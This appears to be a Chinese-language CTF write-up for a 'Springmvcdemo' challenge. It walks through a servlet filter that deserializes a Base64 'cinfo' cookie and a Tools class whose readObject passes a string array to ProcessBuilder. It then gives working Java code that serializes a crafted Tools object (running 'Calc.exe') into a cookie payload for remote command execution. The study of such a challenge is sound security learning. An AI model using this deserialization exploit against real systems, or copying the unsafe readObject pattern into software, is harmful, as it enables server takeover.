Springmvcdemo
在没有提升权限之前,整个环境只有Cookie是可控的,并且提升权限也是要通过cookie来,先看看它对cookie做了什么,看一下过滤器
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
Cookie[] cookies = ((HttpServletRequest)request).getCookies();
boolean exist = false;
Cookie cookie = null;
if (cookies != null) {
Cookie[] var7 = cookies;
int var8 = cookies.length;
for(int var9 = 0; var9 < var8; ++var9) {
Cookie c = var7[var9];
if (c.getName().equals("cinfo")) {
exist = true;
cookie = c;
break;
}
}
}
byte[] bytes;
if (exist) {
String b64 = cookie.getValue();
Decoder decoder = Base64.getDecoder();
bytes = decoder.decode(b64);
ClientInfo cinfo = null;
if (!b64.equals("") && bytes != null) {
try {
cinfo = (ClientInfo)Tools.parse(bytes);
} catch (Exception var14) {
var14.printStackTrace();
}
}
...发现过滤器对cookie的处理调用了一个Tools类,再看看Tools类
package com.tools;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
public class Tools implements Serializable {
private static final long serialVersionUID = 1L;
private String testCall;
public Tools() {
}
public static Object parse(byte[] bytes) throws Exception {
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
return ois.readObject();
}
public static byte[] create(Object obj) throws Exception {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream outputStream = new ObjectOutputStream(bos);
outputStream.writeObject(obj);
return bos.toByteArray();
}
private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
Object obj = in.readObject();
(new ProcessBuilder((String[])((String[])obj))).start();
}
}这个Tools类的readObject,有一个很明显的命令执行。
那么目的就很明显了,需要去触发这个readObject,也就是说需要反序列化一个Tools类
再看Tools的parse方法有一个很明显的readObject,并且也被过滤器调用了
现在链子已经清晰了。
本地构造一个Tools类
package com.tools;
import java.io.*;
public class Tools implements Serializable {
private static final long serialVersionUID = 1L;
public static Object parse(byte[] bytes) throws Exception {
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
return ois.readObject();
}
public String testCall;
public static byte[] create(Object obj) throws Exception {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream outputStream = new ObjectOutputStream(bos);
outputStream.writeObject(obj);
return bos.toByteArray();
}
@Serial
private void writeObject (ObjectOutputStream os) throws IOException {
os . writeObject(new String[]{"Calc.exe"});
}
@Serial
private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException, IOException {
Object obj = in.readObject();
(new ProcessBuilder((String[])obj)).start();
}
}Payload
import java.util.Base64;
import com.tools.Tools;
public class Payload {
public static void main(String[] args) throws Exception {
Tools load = new Tools();
byte[] bytes = Tools.create(load);
Base64.Encoder encoder = Base64.getEncoder();
System.out.println(encoder.encodeToString(bytes));
}
}将得到的数据打印出来修改cookie就成功执行命令了
